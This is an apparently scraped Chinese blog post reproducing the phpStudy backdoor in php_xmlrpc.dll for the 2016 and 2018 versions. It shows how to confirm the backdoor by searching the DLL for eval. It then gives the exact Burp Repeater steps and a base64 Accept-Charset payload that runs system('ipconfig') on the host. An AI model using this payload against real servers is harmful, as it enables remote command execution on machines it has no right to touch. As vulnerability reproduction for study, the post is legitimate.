zoukankan      html  css  js  c++  java
  • phpstudy后门漏洞复现

    前段时间phpstudy被人发现某些版本存在后门,许多人就这样被当作肉鸡长达两年之久

    后门隐藏在程序自带的phpphp_xmlrpc.dll模块

    影响的版本:phpstudy20162018

    H:PhpStudy20180211PHPTutorialphpphp-5.2.17ext找到php_xmlrpc.dll

    notepad++打开,ctrl+f搜索eval

     

    说明这个版本的phpstudy是由后门的

    firefox访问本地ip,用bp抓包,用ctrl+r送到repeater

     

    找到accept-encoding,把逗号后面的空格删掉,deflate后面回车换行,加上accept-charsetc3lzdGVtKCdpcGNvbmZpZycpIDs=,然后go

    (这是system(‘ipconfig’) ;base64加密)

     

    漏洞复现成功

    system(‘path’) ;(分号前面有空格)

     

    安全问题不容小觑啊

  • 相关阅读:
    Oracle:解锁scott用户及设置密码
    js生成条形码
    返回头部效果
    密码强度
    事件委托小效果
    圆形导航效果
    进度条效果
    标题跟随效果
    随机抽人小效果
    点击创建效果
  • 原文地址:https://www.cnblogs.com/shayanboy/p/11605565.html
Copyright © 2011-2022 走看看